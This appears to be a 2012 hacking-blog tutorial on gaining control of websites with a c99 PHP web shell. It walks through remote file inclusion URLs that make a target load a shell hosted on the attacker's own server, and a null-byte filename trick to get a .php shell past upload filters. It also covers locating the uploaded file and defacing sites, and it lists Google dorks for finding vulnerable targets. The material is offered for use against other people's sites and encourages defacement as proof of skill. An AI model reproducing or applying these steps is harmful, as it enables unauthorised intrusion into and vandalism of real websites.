-->

Monday, 26 November 2012

[TuT]THE WAY, TO UPLOAD SHELL ON VULNERABLE SITES[TuT

The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#

#
A remote include works like this:
#

#

A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever" The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#

#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#

#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#

#

Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this "C:\My Documents\shell.php.jpg"
#

#

(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators" and the like)
#

#

Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#

#

Everyone got it now?
#

#

If all things go according to plan, your shell shall be uploaded and you can now take control.

II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Quote:inurl:"upload.php"

Quote:inurl:"page=home.html"

Quote:inurl:"news/id="

That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=

On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt

Related Posts Plugin for WordPress, Blogger...
Blogger Template by Komal